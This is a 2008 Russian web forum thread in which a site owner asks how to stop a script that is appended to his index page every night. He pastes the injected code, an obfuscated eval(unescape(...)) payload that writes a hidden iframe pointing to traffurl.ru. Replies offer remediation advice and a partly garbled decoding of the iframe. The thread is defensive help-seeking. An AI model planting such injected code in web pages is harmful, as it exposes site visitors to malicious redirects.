Подскажите, может кто-то сталкивался с таким:
Уже неделю борюсь с такой проблемой, ночью на страницу index постоянно в конец файла записывается следующий скрипт
eval(u n e s c a p e("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%2
7%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e
%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%2
0%6e%61%6d%65%3d%63%34%66%61%65%61%36%62%37%
63%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f
%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6
%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%6
4%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29
%2a%32%33%36%38%38%29%2b%27%31%35%64%32%64
%5c%27%20%77%69%64%74%68%3d%34%32%20%68%65
%69%67%68%74%3d%35%36%34%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%
6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
Теги скрипт я убрал и переносы строки сделал. Каждый день его из всех страниц приходится удалять, подскажите как от этого избавиться?
1. Mister - 03 Апреля, 2008 - 15:53:52 - перейти к сообщению
2. EuGen - 03 Апреля, 2008 - 15:57:21 - перейти к сообщению
Попробуйте запретить всем запись в этот файл и что из этого выйдет. Если у Вас Windows, включите аудит на доступ по записи к этому файлу. Если Linux - посмотрите в логах.
3. Mister - 03 Апреля, 2008 - 16:00:09 - перейти к сообщению
Ладно, попробую. Дело в том что происходит это на 2 хостингах. Один из них не даёт изменить прав доступа.
4. Dastar - 03 Апреля, 2008 - 16:40:59 - перейти к сообщению
Значит обратись к администрации этого хостинга, так как это и в их интересах.
5. RomAndry - 03 Апреля, 2008 - 16:49:21 - перейти к сообщению
1. НЕМЕДЛЕННО СМЕНИТЬ ПАРОЛИ
2. Удалить ТОТАЛ и не заходить с него
3. вылечить компьютер
4. не посещать более левых сайтов!
2. Удалить ТОТАЛ и не заходить с него
3. вылечить компьютер
4. не посещать более левых сайтов!
6. valenok - 03 Апреля, 2008 - 17:11:01 - перейти к сообщению
После чего один раз проредактировать весь код
( можно сравнивать файлы из бэкапа с текущими )
Вирус наверное не у хостера.
Один из ваших скриптов сам дописывает эту фигню в конец файла.
Текст там получается такой:
( можно сравнивать файлы из бэкапа с текущими )
Вирус наверное не у хостера.
Один из ваших скриптов сам дописывает эту фигню в конец файла.
Текст там получается такой:
PHP:
скопировать код в буфер обмена
скопировать код в буфер обмена
- <iframe=2
- 0name=c4faea6b7=
- 633 src=\'http:/
- /traffurl.ru/s=6
- iv?'+Math.roun=6
- 4(Math.random()
- *23688)+'15d2d
- \' width=42 he
- ight=564 style
- =\'display: no=
- 6ee\'></iframe>